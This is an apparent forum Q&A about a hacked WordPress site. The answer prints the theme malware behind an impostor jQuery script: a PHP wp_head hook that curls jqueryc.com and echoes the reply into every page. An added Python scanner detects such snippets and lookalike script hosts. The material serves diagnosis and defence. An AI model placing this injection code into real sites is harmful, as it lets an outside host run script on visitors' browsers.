Leah

Reputation: 331

Jquery"s" Malware Script

My site has been hacked and I can't for the life of me find where it was injected. I have taken necessary precautions to make sure it doesn't happen again and I am restoring my site to an earlier time from backup, but I would like to know where to find it in case it happens to another site I host.

This is the malicious script: http://www.jquerys.org/ajax/libs/jquery/jquery-1.6.3.min.js

This is the site: (removed now)

I have checked everywhere for it and have not been successful.

Any help would be greatly appreciated.

Thank you.

For those of you downvoting me, I have done a lot of research on trying to fix this myself over the last 4 hours with an 11-month-old on my lap. I only posted the question as a last resort because I have not been successful in doing it on my own. Since I have had great help in the past from people here, I thought it couldn't hurt to ask.

Upvotes: 3

Views: 5029

Answers (1)

Tim M.

Reputation: 54359

Writing up all the comments as an answer, as there is good info here to combat an exploit.


Problem

A script with a URL posing as a jQuery CDN was found in the source of a WordPress-driven site. It sounds like both jquerys.com and jqueryc.com were being used as imposter domains.

The malicious code is simple; it randomly redirects to another site and sets a cookie to prevent immediate redirection (once a day). Since it is infrequent, it would be possible to never see this while developing the site, or to overlook it.

Possible Causes

  • A mistake typing the URL
  • Compromised server
  • A malicious theme
  • A malicious plugin

Resolution

Start with: http://codex.wordpress.org/FAQ_My_site_was_hacked

OP found this code inside the theme:

// !!! Suspect Code - Do not use for any purpose !!!

// Found in the theme's functions.php. On every front-end page load it fetches a
// remote "jQuery" file from the impostor domain and echoes it, unchecked, into <head>.
if (!function_exists('insert_jquery_theme')) {
    function insert_jquery_theme() {
        if (function_exists('curl_init')) {
            // No scheme given, so curl falls back to plain http://
            $url = "jqueryc.com/jquery-1.6.3.min.js";
            $ch = curl_init();
            $timeout = 5;
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
            $data = curl_exec($ch);
            curl_close($ch);
            // Whatever the attacker's server answers is written verbatim into the page
            echo $data;
        }
    }

    // wp_head fires inside <head> on every front-end page, so the injection is site-wide
    add_action('wp_head', 'insert_jquery_theme');
}

Viewing the source, there are actually two references to jQuery; one legitimate and one not. Removing the aforementioned snippet of code resolves the problem.

It will still be important to determine the origin of the malicious code (e.g. the theme, a plugin, or a compromised server). Backups shouldn't be restored without examining them for the malicious code.

Upvotes: 8
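As an added example (not part of the question or the answer above), here is a small Python scanner that does what the OP was trying to do by hand: find the file that injects the impostor jQuery, and confirm the injection in the rendered page. It walks a wp-content-style tree for PHP files that both fetch remote content (curl_init, curl_exec, file_get_contents, wp_remote_get, fopen) and hook wp_head or wp_footer, flags any file that names a jQuery-lookalike host, and separately parses a page's HTML for jQuery-looking <script src> URLs served from neither the site itself nor a known CDN. The CDN allowlist, the directory layout, the site hostname example.com and the sample PHP/HTML files are all assumptions constructed for the demo; in practice you would run scan_php_tree() against a real wp-content/ directory and feed suspicious_script_srcs() the HTML of a live page.

```python
import os, re, tempfile
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts that legitimately serve jQuery; extend with your own CDN.
LEGIT_JQUERY_HOSTS = {"jquery.com", "code.jquery.com", "jquery.org", "jqueryui.com",
                      "ajax.googleapis.com", "cdnjs.cloudflare.com", "ajax.aspnetcdn.com"}
LINE_CHECKS = {  # per-line patterns in PHP source
    "remote_fetch": re.compile(r"\b(curl_init|curl_exec|file_get_contents|wp_remote_get|fopen)\s*\("),
    "head_hook": re.compile(r"add_action\s*\(\s*['\"](wp_head|wp_footer)['\"]"),
}
HOST_RE = re.compile(r"\b((?:[a-z0-9-]+\.)+(?:com|org|net|io))\b", re.I)
JQUERY_FILE_RE = re.compile(r"jquery[-.\w]*\.js$", re.I)

def normalize_host(host):
    host = (host or "").lower()
    return host[4:] if host.startswith("www.") else host

def lookalike_jquery_host(host):
    """jquerys.org, jqueryc.com, ...: contains 'jquery' but is not a known real host."""
    host = normalize_host(host)
    return "jquery" in host and host not in LEGIT_JQUERY_HOSTS

def scan_php_tree(root):
    """Return [(relative path, {category: [line numbers]})] for PHP files worth a look."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                lines = fh.read().splitlines()
            hits = {cat: [] for cat in list(LINE_CHECKS) + ["lookalike_host"]}
            for n, line in enumerate(lines, 1):
                for cat, rx in LINE_CHECKS.items():
                    if rx.search(line):
                        hits[cat].append(n)
                if any(lookalike_jquery_host(h) for h in HOST_RE.findall(line)):
                    hits["lookalike_host"].append(n)
            # Remote fetch plus wp_head/wp_footer hook in one file is the shape of the theme snippet above;
            # a jQuery-lookalike host is suspicious on its own.
            if (hits["remote_fetch"] and hits["head_hook"]) or hits["lookalike_host"]:
                findings.append((os.path.relpath(path, root), hits))
    return findings

class _ScriptSrcParser(HTMLParser):
    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self.srcs.extend(v for k, v in attrs if k.lower() == "src" and v)

def suspicious_script_srcs(html, site_host):
    """Flag jQuery-looking <script src> URLs served from neither the site nor a known CDN."""
    parser = _ScriptSrcParser()
    parser.feed(html)
    site_host = normalize_host(site_host)
    flagged = []
    for src in parser.srcs:
        url = urlparse(src)
        host = normalize_host(url.hostname)
        if JQUERY_FILE_RE.search(url.path) and host not in ("", site_host, *LEGIT_JQUERY_HOSTS):
            flagged.append(src)
    return flagged

# Constructed samples: a theme functions.php carrying the snippet from the answer, a harmless plugin,
# and a rendered page with the site's own jQuery, the impostor copy and a real CDN copy.
SUSPECT_FUNCTIONS_PHP = """<?php
if (!function_exists('insert_jquery_theme')){
    function insert_jquery_theme(){
        $url="jqueryc.com/jquery-1.6.3.min.js";
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        $data = curl_exec($ch);
        curl_close($ch);
        echo $data;
    }
    add_action('wp_head', 'insert_jquery_theme');
}
"""
CLEAN_PLUGIN_PHP = "<?php\nadd_action('wp_enqueue_scripts', 'my_plugin_styles');\n"
SAMPLE_HTML = """<html><head>
<script type="text/javascript" src="http://example.com/wp-includes/js/jquery/jquery.js?ver=1.7.2"></script>
<script src="http://www.jquerys.org/ajax/libs/jquery/jquery-1.6.3.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.3/jquery.min.js"></script>
</head><body></body></html>"""

def run_demo():
    """Write the samples into a temporary wp-content-like tree, scan it, and return both result sets."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in (("themes/sometheme/functions.php", SUSPECT_FUNCTIONS_PHP),
                          ("plugins/cleanplugin/cleanplugin.php", CLEAN_PLUGIN_PHP)):
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path))
            with open(path, "w") as fh:
                fh.write(body)
        php_findings = scan_php_tree(root)
    return php_findings, suspicious_script_srcs(SAMPLE_HTML, "example.com")
```

On the demo tree, run_demo() reports only the theme's functions.php, with the curl calls, the wp_head hook and the jqueryc.com line each pinned to a line number, and flags only the jquerys.org script in the HTML. Point scan_php_tree() at wp-content/ rather than the whole install: WordPress core legitimately both fetches remote content and hooks wp_head, so core is better checked by diffing it against a fresh download of the same version. A restored backup should be scanned the same way before it goes live, since the answer's point is that the backup may already carry the snippet.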